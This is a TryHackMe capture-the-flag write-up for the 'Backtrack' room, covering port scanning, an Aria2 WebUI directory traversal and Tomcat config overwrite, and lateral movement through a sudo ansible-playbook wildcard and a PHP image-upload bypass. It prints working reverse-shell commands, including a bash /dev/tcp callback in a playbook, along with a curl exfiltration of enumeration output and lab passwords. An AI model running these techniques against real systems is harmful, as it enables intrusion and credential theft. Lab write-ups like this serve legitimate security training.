🏃‍♂️Backtrack

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Created by tryhackme, 0utc4st, and YoloSaimo

1 - Port Scans

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -p- backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 06:57 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
6800/tcp open  unknown
8080/tcp open  http-proxy
8888/tcp open  sun-answerbook

Nmap done: 1 IP address (1 host up) scanned in 250.16 seconds

1b - Versions and OS

┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -p22,6800,8080,8888 backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 07:02 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.095s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
|   256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
|_  256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
6800/tcp open  http            aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
8080/tcp open  http            Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
8888/tcp open  sun-answerbook?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sat, 12 Oct 2024 04:02:31 GMT
|     Connection: close
|     <!doctype html>
|     <html>
|     <!-- {{{ head -->
|     <head>
|     <link rel="icon" href="../favicon.ico" />
|     <meta charset="utf-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <meta name="theme-color" content="#0A8476">
|     <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
|     <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
|     <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
|     <!-- }}} -->
|     <body ng-controller="MainCtrl" ng-cloak>
|     <!-- {{{ Icons -->
|_    <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.94SVN%I=7%D=10/12%Time=6709F4D8%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,13F0,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html
--SNIP--
SF:olute;\x20width:\x200;\x20height:\x200;\x20overflow:\x20hidden;\"\x20ve
SF:rsion=\"1\.1\"\x20xm");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT      ADDRESS
1   97.57 ms 10.11.0.1
2   95.60 ms backtrack.thm (10.10.237.46)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.03 seconds

2 - Aria2 WebUI

2a - Finding the vuln

The HTTP server on port 8888 returns a WebUI called Aria2 WebUI. Quickly searching for a vuln on Google:

2b - Directory Traversal

After clearing the cache on the browser, proxying all requests to Burp and holding the requests for a while without forwarding, we can see how the WebUI behaves and what it sends without having to go through the code. We intercept multiple requests without interacting with the browser, but this is the one we are interested in:

Amazing! This is a great way to look inside the targets files.

2c - Gathering sensitive info

Trying to brute-force some well-known files using Intruder crashes the Aria server. We have to access files manually in order not to overwhelm and crash the server.

/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--SNIP--
mysql:x:113:122:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash

/proc/self/environ

LANG=C.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOME=/opt/tomcatLOGNAME=tomcatUSER=tomcatINVOCATION_ID=90e09872525649ba9f513bc55f24ad23JOURNAL_STREAM=9:20272

/opt/tomcat/conf/tomcat-users.xml

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">

  <role rolename="manager-script"/>
  <user username="tomcat" password="OPx52k53D8OkTZpx4fr" roles="manager-script"/>

</tomcat-users>

2z - What we know so far

There are 4 accounts that can be considered human based on their ids: root, tomcat, orville and wilbur
We cannot login using tomcat through ssh (/bin/false)
We collected a password from a well-known configuration file for tomcat
The server on port 8888 runs with privileges of the tomcat user

3 - Foothold

3a - Dead-ends

id_rsa

Trying to collect the private key of the users (except tomcat) did not yield anything

authorized_keys

Trying to authorize my own key by writing to the respective .ssh folders did not work because of a lack of adequate permissions for the tomcat user:

3b - Tomcat, help!

The tomcat admin credentials we got were great, but the user in question has no useful privileges. This is because its role is only 'manager-script'.

We have to find a way to elevate this tomcat user. This can be done only by editing the /opt/tomcat/conf/tomcat-users.xml file. But how can we do that?

Well, since we already know that the server on port 8888 has the Linux 'tomcat' user's privileges, the server can probably overwrite tomcat-users.xml by downloading a new one!

I will host the following file on my machine, where the roles are significantly higher:

tomcat-users.xml

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">

  <role rolename="manager-script"/>
  <user username="tomcat" password="OPx52k53D8OkTZpx4fr" roles="admin-gui,admin-script,manager-gui,manager-status,manager-script,manager-jmx"/>

</tomcat-users>

And now using the Aria2 WebUI:

3c - Have I been here before?

If you look closely at the /manager/html panel above, you will notice a path called /reverse_shell!

Requesting it gives us the following:

I am not sure what is happening here, but it is not worth investigating. I do have enough privileges to upload a shell of my own. I will be using a webshell that is bundled in /usr/share/webshells/jsp/jsp-reverse.jsp.

┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 9001           
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.164.14] 38942
id
uid=1002(tomcat) gid=1002(tomcat) groups=1002(tomcat)
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@Backtrack:~$ ls -la /opt/tomcat/flag1.txt
ls -la /opt/tomcat/flag1.txt
-rw-r--r-- 1 tomcat tomcat 38 Mar  9  2024 /opt/tomcat/flag1.txt

4 - Lateral PrivEsc

4a - LinPEAS

Downloading LinPEAS on target and storing output

tomcat@Backtrack:/tmp$ wget http://10.11.85.12/linpeas.sh
wget http://10.11.85.12/linpeas.sh
--2024-10-12 14:31:24--  http://10.11.85.12/linpeas.sh
Connecting to 10.11.85.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 824745 (805K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 805.42K   790KB/s    in 1.0s    

2024-10-12 14:31:25 (790 KB/s) - ‘linpeas.sh’ saved [824745/824745]

tomcat@Backtrack:/tmp$ chmod u+x linpeas.sh
chmod u+x linpeas.sh
tomcat@Backtrack:/tmp$ ./linpeas.sh > tomcat-enum.txt
./linpeas.sh > tomcat-enum.txt

Encoding and sending output

tomcat@Backtrack:/tmp$ cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
tomcat@Backtrack:/tmp$ curl -X POST --data-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
<a-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
curl: (1) Received HTTP/0.9 when not allowed

tomcat@Backtrack:/tmp$

Receiving and decoding output

┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 90 > tomcat-enum.txt.b64                           
listening on [any] 90 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.156.152] 40854

                                                                                                                                                                                
┌──(kali㉿kali)-[~/public_folder]
└─$ # removed HTTP headers from response, kept body             
                                                                                                     
┌──(kali㉿kali)-[~/public_folder]
└─$ nano tomcat-enum.txt.b64                                    
                                                                                                     
┌──(kali㉿kali)-[~/public_folder]
└─$ dos2unix tomcat-enum.txt.b64
dos2unix: converting file tomcat-enum.txt.b64 to Unix format...
                                                                                                     
┌──(kali㉿kali)-[~/public_folder]
└─$ cat tomcat-enum.txt.b64 | base64 -d > tomcat-enum.txt

Here is the LinPEAS output:

148KB

tomcat-enum.txt

Open

4b - Wilbur

The following lead presented itself before I even ran LinPEAS:

tomcat@Backtrack:/$ sudo -l
sudo -l
Matching Defaults entries for tomcat on Backtrack:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tomcat may run the following commands on Backtrack:
    (wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml

The wildcard above gives us great freedom! We can backtrack to a directory where we have stored a revshell command in a custom yml file:

https://gist.githubusercontent.com/Reelix/32ccf1baaa3066654a460265fca53960/raw/7c61e2ec5c2261d525f4726e5d0511824ac0e15e/reverse-shell.ymlgist.githubusercontent.com

tomcat@Backtrack:/tmp$ cat rev.yml
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/10.11.85.12/9003 0>&1'                                         
tomcat@Backtrack:/tmp$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../../tmp/rev.yml
[WARNING]: provided hosts list is empty, only localhost is available. Note that
the implicit localhost does not match 'all'
--SNIP--
[WARNING]: Skipping plugin (/usr/lib/python3/dist-
packages/ansible/plugins/callback/sumologic.py) as it seems to be invalid:
module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'

PLAY [localhost] ***************************************************************

TASK [Gathering Facts] *********************************************************
ok: [localhost]

TASK [rev] *********************************************************************

┌──(kali㉿kali)-[~/public_folder]
└─$ nc -lvnp 9003                      
listening on [any] 9003 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.238.90] 33938
wilbur@Backtrack:/tmp$ id
id
uid=1004(wilbur) gid=1004(wilbur) groups=1004(wilbur)
wilbur@Backtrack:/tmp$ cd ~
wilbur@Backtrack:~$ ls -la
total 36
drwxrwx--- 5 wilbur wilbur 4096 Oct 13 07:34 .
drwxr-xr-x 4 root   root   4096 Mar  9  2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 07:22 .ansible
lrwxrwxrwx 1 root   root      9 Mar  9  2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar  9  2024 .bashrc
drwx------ 2 wilbur wilbur 4096 Oct 13 07:34 .cache
drwx------ 3 wilbur wilbur 4096 Oct 13 07:28 .gnupg
-rw------- 1 wilbur wilbur   48 Mar  9  2024 .just_in_case.txt
lrwxrwxrwx 1 root   root      9 Mar  9  2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar  9  2024 .profile
-rw------- 1 wilbur wilbur  461 Mar  9  2024 from_orville.txt
wilbur@Backtrack:~$ cat .just_in_case.txt 
in case i forget :

wilbur:mYe317Tb9qTNrWFND7KF

150KB

wilbur-enum.txt

Open

4c - Orville

Something promising appeared in the LinPEAS output, even before we moved to wilbur:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:6800            0.0.0.0:*               LISTEN      460/aria2c          
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      547/java            
tcp6       0      0 :::8080                 :::*                    LISTEN      547/java            
tcp6       0      0 :::6800                 :::*                    LISTEN      460/aria2c          
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::8888                 :::*                    LISTEN      473/node

It seems there is an HTTP server open on port 80, but only on the loopback interface. I wanted to be sure:

tomcat@Backtrack:/tmp$ wget http://127.0.0.1
wget http://127.0.0.1
--2024-10-12 19:11:39--  http://127.0.0.1/
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1264 (1.2K) [text/html]
Saving to: ‘index.html’

index.html          100%[===================>]   1.23K  --.-KB/s    in 0s      

2024-10-12 19:11:39 (150 MB/s) - ‘index.html’ saved [1264/1264]

There is definitely an HTTP server on this port! I need to open a proxy port to access it easily from Kali:

tomcat@Backtrack:/tmp$ wget http://10.11.85.12/socat
wget http://10.11.85.12/socat
--2024-10-12 19:00:49--  http://10.11.85.12/socat
Connecting to 10.11.85.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat               100%[===================>] 366.38K   600KB/s    in 0.6s    

2024-10-12 19:00:49 (600 KB/s) - ‘socat’ saved [375176/375176]

tomcat@Backtrack:/tmp$ chmod u+x socat
chmod u+x socat
tomcat@Backtrack:/tmp$ ./socat -ddd TCP-LISTEN:2345,fork TCP:127.0.0.1:80
./socat -ddd TCP-LISTEN:2345,fork TCP:127.0.0.1:80

With socat listening and proxying on the target machine, I am able to do this:

The website does not give us much wiggle room to try and exploit it from the browser. And it seemed like a dead-end. At least when I was tomcat. But now that I am wilbur, I had access to a very important file:

wilbur@Backtrack:~$ pwd   
pwd
/home/wilbur
wilbur@Backtrack:~$ ls -la
ls -la
total 28
drwxrwx--- 3 wilbur wilbur 4096 Oct 13 03:57 .
drwxr-xr-x 4 root   root   4096 Mar  9  2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 03:57 .ansible
lrwxrwxrwx 1 root   root      9 Mar  9  2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar  9  2024 .bashrc
-rw------- 1 wilbur wilbur   48 Mar  9  2024 .just_in_case.txt
lrwxrwxrwx 1 root   root      9 Mar  9  2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar  9  2024 .profile
-rw------- 1 wilbur wilbur  461 Mar  9  2024 from_orville.txt
wilbur@Backtrack:~$ cat fr*
cat fr*
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:

email : [email protected]
password : W34r3B3773r73nP3x3l$
wilbur@Backtrack:~$

This was the missing puzzle piece! Now I can login and proceed:

We can see that there are no images yet. Let us upload as image of our own and see what happens.

Now the question is: can we upload a shell? I will try to upload my favorite PHP webshell:

p0wny-shell/shell.php at master · flozz/p0wny-shellGitHub

We have to bypass these filters:

However, trying to go to http://backtrack.thm:2345/uploads/shell.gif.php just downloads the file! But we see that in the root directory (above uploads/), where login.php and dashboard.php are stored, the PHP files are rendered instead of sent as is. Dead ends:

Apache/2.4.41 does not have a known directory traversal published, so storing it somewhere on the filesystem using wilbur and trying to access it through Apache won't work
/var/www/html is not accessible using any of the users we compromised

We can however try to add some backtraces to the filename:

Using a simple backtrace will store the file in uploads/. So it fails. We have to use Intruder to try and store it anywhere above uploads/ (ideally just above it). To do that, we will use a famous repo's wordlist:

PayloadsAllTheThings/Directory Traversal/Intruder/deep_traversal.txt at master · swisskyrepo/PayloadsAllTheThingsGitHub

146KB

orville-enum.txt

Open

5 - ROOT

PreviousCTF writeups NextBrainpan 1

Last updated 1 year ago

Was this helpful?